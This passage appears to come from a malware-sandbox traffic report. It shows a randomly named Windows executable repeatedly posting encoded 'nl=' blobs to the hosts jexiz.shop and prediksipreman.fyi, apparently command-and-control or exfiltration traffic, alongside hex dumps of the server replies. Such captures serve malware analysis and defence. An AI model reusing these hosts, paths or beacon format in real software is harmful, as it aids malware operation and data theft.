58 44 41 65 4e 32 4c 74 67 50 57 5a 2b 64 49 56 4b 65 2b 59 4e 4a 6f 70 7a 4a 63 65 6d 71 31 5a 59 4b 7a 55 76 77 61 4f 32 43 54 44 75 30 61 6a 4e 6d 74 71 33 4c 33 56 6d 47 76 70 74 4f 63 7a 54 35 65 77 51 36 30 50 61 51 45 4f 64 2b 63 37 52 59 65 2f 53 43 79 52 38 78 58 4f 67 32 46 6a 31 42 6e 71 4d 65 39 55 51 4a 6d 6d 47 38 66 70 59 2b 32 4a 58 69 6b 4d 6e 75 73 73 51 41 72 69 52 4b 30 4f 5a 6c 73 74 49 46 69 78 4f 43 77 47 73 51 51 52 66 2f 47 73 45 33 6d 4f 59 6b 77 4d 58 62 57 32 73 4a 67 65 73 59 4a 68 6b 63 55 3d Data Ascii: nl=hkWRsVxeFftspcoWfpm/HMrsXDAeN2LtgPWZ+dIVKe+YNJopzJcemq1ZYKzUvwaO2CTDu0ajNmtq3L3VmGvptOczT5ewQ60PaQEOd+c7RYe/SCyR8xXOg2Fj1BnqMe9UQJmmG8fpY+2JXikMnussQAriRK0OZlstIFixOCwGsQQRf/GsE3mOYkwMXbW2sJgesYJhkcU=
Nov 1, 2024 03:46:06.480633974 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Fri, 01 Nov 2024 02:46:06 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49975	8.210.3.99	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:08.078345060 CET	728	OUT	POST /li8d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.jexiz.shop Origin: http://www.jexiz.shop Referer: http://www.jexiz.shop/li8d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 68 6b 57 52 73 56 78 65 46 66 74 73 6f 39 34 57 64 4b 2b 2f 57 63 72 72 4c 7a 41 65 43 57 4c 70 67 50 61 5a 2b 66 6b 46 4b 74 61 59 4e 6f 59 70 79 4c 6b 65 6e 71 31 5a 54 71 7a 56 6c 51 61 46 32 43 66 68 75 30 32 6a 4e 6d 35 71 33 4f 54 56 6d 33 76 6d 73 65 63 78 61 5a 65 79 4e 4b 30 50 61 51 45 4f 64 2b 59 52 52 63 36 2f 53 52 71 52 39 51 58 4e 6a 32 46 67 38 68 6e 71 48 2b 39 51 51 4a 6d 55 47 39 44 48 59 38 2b 4a 58 6a 55 4d 6b 38 49 74 61 41 72 6b 63 71 30 66 66 6e 6c 63 52 47 65 2b 53 52 55 46 7a 79 67 37 61 4a 33 47 65 56 75 6d 4c 45 63 30 48 49 65 42 39 35 42 33 32 37 5a 52 36 4c 43 5a 70 49 6d 6f 34 64 4b 6f 41 48 62 6f 66 52 75 6f 47 65 72 6b Data Ascii: nl=hkWRsVxeFftso94WdK+/WcrrLzAeCWLpgPaZ+fkFKtaYNoYpyLkenq1ZTqzVlQaF2Cfhu02jNm5q3OTVm3vmsecxaZeyNK0PaQEOd+YRRc6/SRqR9QXNj2Fg8hnqH+9QQJmUG9DHY8+JXjUMk8ItaArkcq0ffnlcRGe+SRUFzyg7aJ3GeVumLEc0HIeB95B327ZR6LCZpImo4dKoAHbofRuoGerk
Nov 1, 2024 03:46:09.023706913 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Fri, 01 Nov 2024 02:46:08 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49988	8.210.3.99	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:10.624748945 CET	1745	OUT	POST /li8d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.jexiz.shop Origin: http://www.jexiz.shop Referer: http://www.jexiz.shop/li8d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 68 6b 57 52 73 56 78 65 46 66 74 73 6f 39 34 57 64 4b 2b 2f 57 63 72 72 4c 7a 41 65 43 57 4c 70 67 50 61 5a 2b 66 6b 46 4b 74 53 59 4d 61 51 70 30 73 49 65 6b 71 31 5a 50 61 7a 59 6c 51 61 59 32 43 58 6c 75 30 71 73 4e 6c 42 71 33 6f 50 56 67 44 44 6d 69 75 63 78 58 35 65 78 51 36 30 61 61 55 67 43 64 2b 49 52 52 63 36 2f 53 51 61 52 74 78 58 4e 6c 32 46 6a 31 42 6e 59 4d 65 39 34 51 4a 75 2b 47 38 33 35 59 4e 65 4a 58 41 73 4d 72 75 51 74 57 41 72 6d 62 71 31 43 66 6e 35 48 52 47 43 45 53 51 68 75 7a 77 41 37 59 50 37 64 47 51 4f 69 64 55 4d 41 53 66 6d 54 71 4d 4d 62 32 49 78 6a 6c 4b 4f 43 73 34 36 7a 32 70 4b 51 4b 48 4b 63 4a 58 69 39 4d 6f 61 34 2b 59 46 59 77 4f 54 6d 47 48 65 38 56 6b 36 38 52 49 69 48 50 6d 62 34 41 31 54 36 46 63 6b 35 42 6d 64 33 36 33 47 65 54 50 33 50 2f 7a 4d 66 4e 64 68 6e 6e 47 36 45 55 43 32 4d 33 77 46 47 75 7a 6f 5a 47 43 78 73 4e 36 69 6a 46 79 44 4f 77 70 67 70 66 79 75 68 55 6d 58 76 62 32 51 32 47 4f 6d 37 74 57 7a 78 66 6a 44 35 79 62 64 6b 54 49 45 [TRUNCATED] Data Ascii: nl=hkWRsVxeFftso94WdK+/WcrrLzAeCWLpgPaZ+fkFKtSYMaQp0sIekq1ZPazYlQaY2CXlu0qsNlBq3oPVgDDmiucxX5exQ60aaUgCd+IRRc6/SQaRtxXNl2Fj1BnYMe94QJu+G835YNeJXAsMruQtWArmbq1Cfn5HRGCESQhuzwA7YP7dGQOidUMASfmTqMMb2IxjlKOCs46z2pKQKHKcJXi9Moa4+YFYwOTmGHe8Vk68RIiHPmb4A1T6Fck5Bmd363GeTP3P/zMfNdhnnG6EUC2M3wFGuzoZGCxsN6ijFyDOwpgpfyuhUmXvb2Q2GOm7tWzxfjD5ybdkTIEmV2rLjc9jxnQF05mM4/TO7OpBWqVMdB382k4gW8NkAbK640g+uqGHJvC+O3vm5UCYBPYRBSXtOCPh0e34/9Nne5RYNt1ObmopcyENvB/8xcpiXLl1sG3cKnCCdNJMfX7URq5iD9XSID6hbnjv4wXj3ucO/HAcnB8ptTeEc3gcHp00py/dPCW6EXBXC7/ZaAZu6hmYV5XDbX48AH+2Up7CqxfkaP2RJYvjbYkBqc0QzCZWm+53Lm81ilnLm8/z1LGMcl25mADlM3B5VZwOkVKvXADGAmCrCE1vx2ZetfAFM6UVHRlO7kFBfA1y2urZD2/7L7HZRUPw4TIqIlQl4gAIek9DiYVT31wudCi0QBMTngIT5wX4FJEMhi3kyexpmNzt+kA406RnV5tx2WjYHjhD4n4l/QXUokQz9aq/EU5xaS/N0o8WvaxDYZOx89X7tmQYjVN4i3sCeECWwwjqWSh3Fn7F+WSdwgMZ1QXgrUiYBXCU179G3GKKn46uiLuwv74h6EBQ7GrBS70tdTHgnx6SCLvfD6ZBSlNm1fmTAtN0bIZ8eobgV7kSmhdrR81R48AUss/KE1rqfN9hlAz7ITNcMCicQVFZzLdS6uxgc//krrvDRnZ7LgtjszTAcvKRnBFjjQhz7y6rwuE0aEzjqkdG9Px1tb1S3a+8Y [TRUNCATED]
Nov 1, 2024 03:46:11.596034050 CET	417	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/ Content-Type: text/html; charset=utf-8 Date: Fri, 01 Nov 2024 02:46:11 GMT Connection: close Content-Length: 226 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 20 20 20 50 6c 65 61 73 65 20 75 73 65 20 48 54 54 50 53 20 69 6e 73 74 65 61 64 2e 20 2d 2d 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49989	8.210.3.99	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:13.176136971 CET	464	OUT	GET /li8d/?nl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.jexiz.shop User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:46:14.150746107 CET	733	IN	HTTP/1.1 301 Moved Permanently Location: https://www.jexiz.shop/li8d/?nl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&dbL=d8WX_v0PGVHXAtK Content-Type: text/html; charset=utf-8 Date: Fri, 01 Nov 2024 02:46:13 GMT Connection: close Content-Length: 386 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 78 69 7a 2e 73 68 6f 70 2f 6c 69 38 64 2f 3f 6e 6c 3d 73 6d 2b 78 76 6c 46 4e 4a 38 4a 6e 31 4d 41 76 42 4c 48 66 46 62 6d 70 57 44 52 6d 4d 42 58 6e 68 59 75 44 74 4e 34 51 44 75 75 6f 4f 49 51 37 32 49 42 52 37 76 74 58 53 72 50 30 69 6d 54 38 75 51 44 2b 69 30 32 34 4a 79 30 35 67 4a 76 72 73 6d 62 72 6f 6f 63 73 51 35 2f 73 4e 4c 6c 77 65 48 6f 79 5a 4e 6c 65 53 4d 32 72 43 7a 66 59 35 68 76 30 71 53 67 4a 72 68 43 49 54 4f 45 45 48 67 3d 3d 26 61 6d 70 3b 64 62 4c 3d 64 38 57 58 5f 76 30 50 47 56 48 58 41 74 4b 27 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 21 2d 2d 20 48 65 6c 6c 6f 20 44 65 76 65 6c 6f 70 65 72 20 50 65 72 73 6f 6e 21 20 57 65 20 64 6f 6e 27 74 20 73 65 72 76 65 20 69 6e 73 65 63 75 72 65 20 72 65 73 6f 75 72 63 65 73 20 61 72 6f 75 6e 64 20 68 65 72 65 2e 0a 20 [TRUNCATED] Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/?nl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&dbL=d8WX_v0PGVHXAtK'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49990	162.0.215.244	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:19.488913059 CET	732	OUT	POST /3lre/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Referer: http://www.prediksipreman.fyi/3lre/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 64 56 62 4a 4a 48 73 59 6d 38 32 68 34 55 41 51 6d 4f 79 46 33 77 2f 33 70 72 44 79 49 57 51 33 2f 70 7a 54 50 38 58 5a 68 35 68 38 31 33 5a 77 31 51 47 39 52 66 73 36 71 75 44 2f 74 71 33 6a 53 49 41 45 6f 71 4f 42 48 58 5a 4c 62 58 34 4f 73 62 5a 72 75 58 62 50 66 7a 62 56 47 32 45 68 51 43 2b 6e 4f 70 6a 72 53 50 6b 47 6f 59 39 69 6c 69 61 48 42 42 39 6f 35 35 55 74 70 4a 63 58 6b 50 66 50 48 4e 67 50 63 67 62 47 33 4f 50 73 38 70 46 50 50 50 54 44 6e 68 58 33 6d 2f 74 47 6d 64 70 66 6b 4e 6d 52 2b 42 6a 34 43 45 4d 72 6a 4f 69 54 57 77 64 42 4a 49 30 3d Data Ascii: nl=y499qLhHiVJodVbJJHsYm82h4UAQmOyF3w/3prDyIWQ3/pzTP8XZh5h813Zw1QG9Rfs6quD/tq3jSIAEoqOBHXZLbX4OsbZruXbPfzbVG2EhQC+nOpjrSPkGoY9iliaHBB9o55UtpJcXkPfPHNgPcgbG3OPs8pFPPPTDnhX3m/tGmdpfkNmR+Bj4CEMrjOiTWwdBJI0=
Nov 1, 2024 03:46:20.178785086 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 01 Nov 2024 02:46:20 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED] Data Ascii: 1351ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L46cTV@UiV#,:\|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~GylYXqfG}g}z@Jf]e7{.(r~tnWZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>nKou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a\|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
Nov 1, 2024 03:46:20.178828955 CET	212	IN	Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia\|S\|zv]=@]ROoOg>Fz{21dWo^3
Nov 1, 2024 03:46:20.178877115 CET	1236	IN	Data Raw: fe b1 86 fb 19 6f c6 65 5a 65 16 d7 d5 07 c6 f5 72 19 bf f2 1f fd ca be bd 5e 6f 3e 18 7a 3d 12 72 73 4f ef 97 dd 08 e7 e5 c2 fd ac fd 0f 00 74 13 af 3f 53 fc 1b d5 0f 9c cf 64 02 44 fb bf 70 3e 3f ba 8d ba 88 ff e4 98 95 f9 70 71 23 70 9e fa 7f Data Ascii: oeZer^o>z=rsOt?SdDp>?pq#p_ZdN/d%LPZpz4?2CYVvjCmQK!K4.fx:2ux1z2;\|gYfuL>Ca!;@IMu.>%
Nov 1, 2024 03:46:20.178958893 CET	212	IN	Data Raw: cc 09 8d 73 68 79 29 53 13 79 b9 35 b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5 Data Ascii: shy)Sy5>*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;
Nov 1, 2024 03:46:20.179008961 CET	1236	IN	Data Raw: d5 e1 7e a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b4 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 Data Ascii: ~cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]F9I?!S@kpF38'!6I;ywV4-"g)W3i$v#TsT2r,.,$p][YZL'939}Zv
Nov 1, 2024 03:46:20.179085016 CET	1105	IN	Data Raw: 78 3b ac 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 Data Ascii: x;uW$FNcYXp8.Y=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)Wf-%zO`XI(B46;PIIdl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49991	162.0.215.244	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:22.040221930 CET	752	OUT	POST /3lre/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Referer: http://www.prediksipreman.fyi/3lre/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 53 57 54 4a 53 6b 45 59 32 73 32 67 33 30 41 51 73 75 79 42 33 77 7a 33 70 76 54 69 4a 67 49 33 6d 49 6a 54 64 4a 72 5a 67 35 68 38 36 58 5a 78 36 77 47 71 52 66 6f 79 71 75 50 2f 74 71 4c 6a 53 4e 38 45 6f 5a 6d 47 57 58 5a 46 53 33 34 41 6f 62 5a 72 75 58 62 50 66 79 2f 76 47 79 51 68 58 7a 4f 6e 50 4e 58 6f 62 76 6b 42 76 59 39 69 68 69 62 76 42 42 38 4e 35 39 55 48 70 4c 55 58 6b 4f 76 50 48 63 67 4d 56 67 62 45 36 75 4f 41 34 6f 55 4b 4b 70 6a 58 71 48 69 6c 7a 64 64 56 71 4c 59 31 2b 76 75 35 74 68 50 41 53 58 45 63 79 2b 44 36 4d 54 4e 78 58 66 6a 34 6a 61 2b 59 4b 33 4c 49 65 52 4a 30 4c 78 66 7a 2f 53 74 79 Data Ascii: nl=y499qLhHiVJoSWTJSkEY2s2g30AQsuyB3wz3pvTiJgI3mIjTdJrZg5h86XZx6wGqRfoyquP/tqLjSN8EoZmGWXZFS34AobZruXbPfy/vGyQhXzOnPNXobvkBvY9ihibvBB8N59UHpLUXkOvPHcgMVgbE6uOA4oUKKpjXqHilzddVqLY1+vu5thPASXEcy+D6MTNxXfj4ja+YK3LIeRJ0Lxfz/Sty
Nov 1, 2024 03:46:22.713128090 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 01 Nov 2024 02:46:22 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED] Data Ascii: 1351ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L46cTV@UiV#,:\|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~GylYXqfG}g}z@Jf]e7{.(r~tnWZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>nKou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a\|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
Nov 1, 2024 03:46:22.713205099 CET	1236	IN	Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia\|S\|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
